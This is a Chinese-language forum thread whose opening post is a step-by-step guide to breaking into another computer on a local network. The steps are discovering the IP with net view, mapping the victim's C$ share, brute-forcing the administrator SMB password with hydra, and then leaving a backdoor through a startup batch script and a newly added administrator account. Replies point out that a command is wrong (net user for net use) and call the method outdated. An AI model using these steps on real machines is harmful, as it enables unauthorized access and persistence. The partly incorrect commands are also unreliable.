找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 715|回复: 17

一个简单的内网渗透

[复制链接]

20

主题

81

回帖

202

积分

中级会员

积分
202
发表于 2017-9-11 11:43:38 | 显示全部楼层 |阅读模式
在一个局域网里想要拿下某台计算机怎么做呢?方法是挺多的,在这里我就说一种吧。

  • 知道对方的IP,方法有net view命令,然后再ping计算机名。

  • 知道IP后用命令net user k: \\ip\c$ 注:这条命令意思是把对方电脑的c盘映射到自己电脑形成一个k盘 。
  • 此时如果对方没有设置密码我们就成功在自己电脑有个k盘,如果提示要输入密码,我们还可以用工具hydra进行爆破。
  • 在命令里输入cd hydra 注:表示进入文件夹
  • 输入命令hydra.exe -l administrator -p pass.text ip smb 注:准备破解管理员密码,pass.txt是密码文件夹。
  • 最后拿到管理员密码。成功映射对方c盘到自己电脑形成k盘。
  • 弄好后,我们是不是要留个后门,方便下次我们进去呢。
  • 用命令“copy con c:\文件夹名 bat” 注:把这个脚本放到对方开机启动里。
  • 在对方创建一个账号,用命令“net user 用户名 /add” 然后用命令“net localgroup administrators cracer/add” 注:先创建用户然后把这个账号提权到有管理员权限。方便我们下次进去。
朋友们,你们有什么更好好的方法呢,欢迎来留言。
回复

使用道具 举报

17

主题

76

回帖

186

积分

注册会员

积分
186
发表于 2017-9-11 12:43:38 | 显示全部楼层
第二个命令就错了不是net user 应该是net use
回复

使用道具 举报

匿名  发表于 2017-9-11 12:43:38
小编醒醒,大清亡了
回复

使用道具

25

主题

72

回帖

194

积分

注册会员

积分
194
发表于 2017-9-11 12:43:38 | 显示全部楼层
多处错误,没有可行性……
回复

使用道具 举报

25

主题

106

回帖

262

积分

中级会员

积分
262
发表于 2017-9-11 12:43:38 | 显示全部楼层
对方得是裸奔,又没有任何安全设置优化,并且还得是你同局域网
回复

使用道具 举报

匿名  发表于 2017-9-11 12:43:38
十年前有点用!
回复

使用道具

25

主题

72

回帖

194

积分

注册会员

积分
194
发表于 2017-9-11 12:43:38 | 显示全部楼层
大禹治水的时候,因为孩子捣鼓这些命令,气的不回家
回复

使用道具 举报

25

主题

95

回帖

240

积分

中级会员

积分
240
发表于 2017-9-11 12:43:38 | 显示全部楼层
win2000热泪盈眶:到底你们还是爱我的。
回复

使用道具 举报

22

主题

84

回帖

212

积分

中级会员

积分
212
发表于 2017-9-11 12:43:38 | 显示全部楼层
十年前玩过的为什么不建空连接或者端口溢出了
回复

使用道具 举报

20

主题

81

回帖

202

积分

中级会员

积分
202
 楼主| 发表于 2017-9-11 12:43:38 | 显示全部楼层
这个也能上头条!印度人教你开挂的?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|芝加哥华人服务中心

GMT-5, 2024-6-8 00:54 , Processed in 0.079804 second(s), 18 queries .

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表